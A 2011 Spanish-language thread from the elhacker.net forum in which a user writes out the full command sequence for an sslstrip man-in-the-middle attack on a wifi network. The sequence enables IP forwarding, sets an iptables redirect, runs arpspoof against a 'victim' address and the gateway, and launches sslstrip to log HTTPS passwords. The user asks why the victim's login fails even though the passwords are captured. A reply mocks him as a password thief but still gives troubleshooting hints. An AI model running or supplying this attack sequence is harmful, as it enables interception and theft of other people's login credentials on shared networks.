elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Comunicaciones
| |-+  Redes
| | |-+  sslstrip & backtrack 5: No entra en la pagina
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: sslstrip & backtrack 5: No entra en la pagina  (Leído 4,830 veces)
Gambino_88

Desconectado Desconectado

Mensajes: 1


Ver Perfil
sslstrip & backtrack 5: No entra en la pagina
« en: 15 Junio 2011, 22:04 pm »

Estoy utilizando Backtrack 5 para intentar snifar el trafico https de mi red wifi.

Tras realizar el ataque cuando entro a una pagina https desde el ordenador victima, me he fijado que si se ha eliminado el ssl (La pagina es http en vez de https, hasta ahi todo perfecto)

Pero cuando introduzco mi user y contraseña para hacer login, al aceptar me vuelve a dirigir a la pagina del login, como que los el user y password fuesen incorrectos.

Al mirar el archivo sslstrip.log veo que las contraseñas han quedado guardadas, como que todo hubiera ido normal.

Los comandos que utilizo son estos:

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

arpspoof -i wlan0 -t 192.168.1.3 192.168.1.1    (siendo la 1era la victima y la 2a el gateway, aunque lo he probado tambien del reves)

cd /pentest/web/sslstrip
python sslstrip.py -l 8080

Y despues abro el archivo sslstrip.log


Alguien me puede echar una mano?
Gracias de antemano.



En línea

int_0x40


Desconectado Desconectado

Mensajes: 300


Ver Perfil
Re: sslstrip & backtrack 5: No entra en la pagina
« Respuesta #1 en: 17 Junio 2011, 17:09 pm »

Si eres del 88 estas muy chavo para hacer carrera profesional de "roba-passwords-de-hotmail", eso dejaselo a egresados de Palito y Bolita II. Supongo que te leiste con gran felicidad el tuto que hizo sozemu y te fijarias que hay que actualizar a la ultima version de sslstrip. Ademas puede ser que el usuario del que obtuviste pass este logeado. No quiero creer en la posibilidad de que alguien en la red local te pueda estar pagando con la misma moneda haciendo forwarding a tus paquetes y presentandote un documento de login apocrifo. xDD

Un saludo


« Última modificación: 17 Junio 2011, 17:11 pm por int_0x40 » En línea

"The girl i love...she got long black wavy hair ”
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
sslstrip en wifiway 2.0.2
Wireless en Linux
valdomero 1 3,710 Último mensaje 23 Marzo 2011, 23:07 pm
por valdomero
Instalar SSLStrip 0.9 en Backtrack 5 R1 (Resuelto)
Hacking
alpha015 1 7,934 Último mensaje 13 Septiembre 2011, 10:55 am
por alpha015
Pagina de tools backtrack?
GNU/Linux
Puntoinfinito 5 2,690 Último mensaje 24 Mayo 2012, 23:16 pm
por portaro
Ayuda con backtrack 5. No me entra cuando hay que logear...
GNU/Linux
TopoJunior 4 3,925 Último mensaje 5 Febrero 2013, 09:45 am
por peib0l
No entra a partes de una pagina web
Dudas Generales
Raulhispano 6 3,381 Último mensaje 9 Marzo 2021, 22:47 pm
por genofinder
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines